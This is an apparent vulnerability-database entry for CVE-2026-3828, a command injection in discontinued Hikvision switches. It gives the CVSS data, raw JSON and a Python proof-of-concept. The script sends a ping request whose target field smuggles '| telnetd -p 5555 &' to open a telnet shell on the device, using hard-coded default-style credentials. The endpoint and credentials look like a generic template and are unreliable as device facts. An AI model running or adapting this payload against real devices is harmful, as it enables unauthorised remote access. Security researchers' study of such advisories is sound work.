Security Vulnerability Report
中文
CVE-2026-3828 CVSS 7.2 HIGH

CVE-2026-3828

Published: 2026-05-09 09:16:09
Last Modified: 2026-05-11 16:17:31
Source: [email protected]

Description

Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

海康威视部分交换机产品 (2023年12月前停产版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_ip = "192.168.1.1" target_url = f"http://{target_ip}/cgi-bin/admin/command" # Valid credentials are required (PR:H) username = "admin" password = "admin123" # Malicious payload to execute (e.g., create a test file or reverse shell) # The vulnerability allows command injection due to insufficient input validation payload = "| telnetd -p 5555 &" # Crafted packet data data = { "username": username, "password": password, "operation": "ping", "target": "127.0.0.1" + payload # Injection point } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: print(f"[*] Sending exploit request to {target_url}...") response = requests.post(target_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if telnet port 5555 is open.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3828", "sourceIdentifier": "[email protected]", "published": "2026-05-09T09:16:09.107", "lastModified": "2026-05-11T16:17:31.120", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/command-execution-vulnerability-in-some-hikvision-switch-product/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.